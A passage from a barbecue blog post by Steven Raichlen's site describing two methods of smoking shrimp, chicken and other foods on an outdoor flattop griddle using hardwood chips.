Next, I added handfuls of hardwood chips (or a couple wood chunks) on the charcoal at the edge of the grill.   When I saw smoke, I placed the food—shrimp in this case—on the griddle.   I kept the grill lid closed to hold in the smoke.   My smoke-griddled shrimp were amazing, and so were the pork tenderloins, chicken breasts, and salmon steaks I griddled subsequently. 

No one was more surprised than I was.

Smoke Griddling Method #2: Smoking Directly on the Griddle Surface

Smoke Method #2

Even more surprising was Smoke griddling method #2.   In this method, you smoke right on the griddle itself.

I was trying to make a griddled version of barbecued chicken with Alabama white sauce.   I heated one zone of the griddle to high and one zone to medium.   I mounded a handful of hardwood chips (you can also use hardwood sawdust or pellets) directly on the griddle over the hot zone.   When the chips started to smoke, I slid the wood to the medium zone and place the chicken next to it.   Then I placed a griddle dome on top.   I griddled the chicken covered, while wood smoke swirled all around it.   And damn if it didn’t taste like barbecued chicken I’d smoke on the grill. 

So before you dismiss outdoor griddles as being inferior to grills or smokers, try smoking on your flattop.

Related Blogs

Check out our 1000+ Recipes section here on Barbecue Bible.Com

Also, sign up for our Up in Smoke newsletter so you don't miss any blogs and receive some special offers! PLUS get Raichlen's Burgers! PDF for free!

Follow Steven on Facebook, Instagram, YouTube, TikTok, Reddit, and Pinterest!

Check out our store powered by BBQGuys!

The post Barbecue on the Griddle? A Revolutionary Technique for Smoking on a Flattop appeared first on Barbecuebible.com.

❌
❌